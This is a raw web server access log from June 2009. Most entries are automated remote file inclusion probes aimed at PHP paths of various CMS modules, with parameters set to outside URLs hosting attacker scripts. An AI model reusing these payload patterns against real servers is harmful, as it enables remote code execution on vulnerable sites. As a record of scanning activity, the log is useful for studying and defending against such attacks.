69.65.10.238 - - [28/Jun/2009:06:42:02 -0400] "GET /logs/access_log.Q109052800%20%20/include/mail.inc.php?skin_board_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.131.116.12 - - [28/Jun/2009:06:42:07 -0400] "GET /logs/access_log.Q109060100//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:42:07 -0400] "GET //include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:42:09 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
125.131.116.12 - - [28/Jun/2009:06:42:24 -0400] "GET /logs/access_log.Q109052700//include/bbs.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jun/2009:06:42:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
173.1.96.154 - - [28/Jun/2009:06:42:56 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:42:56 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:42:56 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:43:18 -0400] "GET /logs/access_log.Q109051600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
218.234.21.178 - - [28/Jun/2009:06:44:19 -0400] "GET /logs/access_log.Q109051100//components/com_flyspray/startdown.php?file=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
173.1.96.154 - - [28/Jun/2009:06:44:39 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.147.29.190 - - [28/Jun/2009:06:44:41 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:44:41 -0400] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:44:41 -0400] "GET /logs/access_log.Q109061200/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:44:41 -0400] "GET /logs/access_log.Q109051900/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
173.1.96.154 - - [28/Jun/2009:06:45:42 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:45:44 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
66.249.71.204 - - [28/Jun/2009:06:45:47 -0400] "GET /logs/access_log.Q108040200 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.223.3.98 - - [28/Jun/2009:06:46:02 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:06:46:02 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:06:46:02 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:06:46:17 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:06:46:17 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:06:46:17 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jun/2009:06:46:18 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:06:46:24 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:06:46:24 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:06:46:24 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
89.223.3.98 - - [28/Jun/2009:06:46:36 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:06:46:39 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
173.1.96.154 - - [28/Jun/2009:06:47:04 -0400] "GET /logs/access_log.Q109060900///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:47:04 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:47:05 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 7320 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:47:06 -0400] "GET /logs/access_log.Q109060900///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:47:06 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:47:06 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 7320 "-" "libwww-perl/5.805"
217.147.29.190 - - [28/Jun/2009:06:47:29 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:06:47:29 -0400] "GET /logs/access_log.Q109051900%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:47:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
173.1.96.154 - - [28/Jun/2009:06:48:31 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:48:33 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:49:35 -0400] "GET /logs/access_log.Q109060600///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:49:35 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:49:35 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 7320 "-" "libwww-perl/5.805"
216.75.60.116 - - [28/Jun/2009:06:50:05 -0400] "GET //skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:06:50:05 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:06:50:05 -0400] "GET /logs//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
173.1.96.154 - - [28/Jun/2009:06:50:23 -0400] "GET /logs/access_log.Q109061900///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:50:25 -0400] "GET /logs/access_log.Q109061900///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:50:47 -0400] "GET /logs/access_log.Q109060600///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:50:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
173.1.96.154 - - [28/Jun/2009:06:50:47 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 200 7320 "-" "libwww-perl/5.805"
72.30.142.179 - - [28/Jun/2009:06:50:48 -0400] "GET /images/ACE_Orderform.pdf HTTP/1.0" 200 31826 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.75.60.116 - - [28/Jun/2009:06:50:59 -0400] "GET //skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:06:50:59 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.75.60.116 - - [28/Jun/2009:06:50:59 -0400] "GET /logs//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.234.21.178 - - [28/Jun/2009:06:51:14 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:06:51:14 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:06:51:14 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:06:51:15 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:06:51:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:06:51:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
86.109.166.161 - - [28/Jun/2009:06:51:25 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:51:25 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:51:25 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:51:28 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:51:28 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:51:28 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
218.234.21.178 - - [28/Jun/2009:06:51:46 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
86.109.166.161 - - [28/Jun/2009:06:51:54 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:51:57 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
218.234.21.178 - - [28/Jun/2009:06:52:08 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.189.18.73 - - [28/Jun/2009:06:52:22 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.18.73 - - [28/Jun/2009:06:52:44 -0400] "GET /logs/access_log.Q109061100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:52:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.75.60.116 - - [28/Jun/2009:06:53:14 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.169.210.130 - - [28/Jun/2009:06:53:29 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
216.75.60.116 - - [28/Jun/2009:06:53:29 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/write.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.169.210.130 - - [28/Jun/2009:06:53:30 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
217.169.210.130 - - [28/Jun/2009:06:53:30 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
89.223.3.98 - - [28/Jun/2009:06:54:15 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:06:54:59 -0400] "GET /logs/error_log.Q108122700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.189.18.73 - - [28/Jun/2009:06:55:53 -0400] "GET /logs/access_log.Q109061100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:06:56:20 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:56:29 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
63.223.85.28 - - [28/Jun/2009:06:56:55 -0400] "GET //bbs/outlogin.php?_zb_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:06:56:55 -0400] "GET /logs/access_log.Q109051900//bbs/outlogin.php?_zb_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:06:56:55 -0400] "GET /logs//bbs/outlogin.php?_zb_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.234.21.178 - - [28/Jun/2009:06:57:37 -0400] "GET //include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:06:57:37 -0400] "GET /logs/access_log.Q109053000//include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:06:57:37 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.13.191.186 - - [28/Jun/2009:06:57:38 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:06:57:43 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:06:57:43 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:06:57:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.204 - - [28/Jun/2009:06:57:48 -0400] "GET /logs/error_log.Q109022800 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.13.191.186 - - [28/Jun/2009:06:57:59 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:06:57:59 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:06:57:59 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
86.109.166.161 - - [28/Jun/2009:06:58:07 -0400] "GET /logs/error_log.Q109060300%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:58:07 -0400] "GET /logs/error_log.Q109051900%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
83.13.191.186 - - [28/Jun/2009:06:58:14 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
86.109.166.161 - - [28/Jun/2009:06:58:14 -0400] "GET /logs/error_log.Q109060300%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
86.109.166.161 - - [28/Jun/2009:06:58:14 -0400] "GET /logs/error_log.Q109051900%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
217.169.210.130 - - [28/Jun/2009:06:58:15 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
83.13.191.186 - - [28/Jun/2009:06:58:26 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
210.205.57.2 - - [28/Jun/2009:06:58:45 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
210.205.57.2 - - [28/Jun/2009:06:58:49 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
124.0.103.194 - - [28/Jun/2009:06:58:49 -0400] "GET /logs/access_log.Q109060700%20%20//bemarket/postscript/postscript.php?p_mode=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:06:58:56 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:58:56 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:58:56 -0400] "GET /logs//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:58:57 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:58:57 -0400] "GET //include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:06:58:57 -0400] "GET /logs//include.php?path[docroot]=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
218.234.21.178 - - [28/Jun/2009:06:59:11 -0400] "GET /logs/access_log.Q109053000//include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:06:59:11 -0400] "GET //include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:06:59:11 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
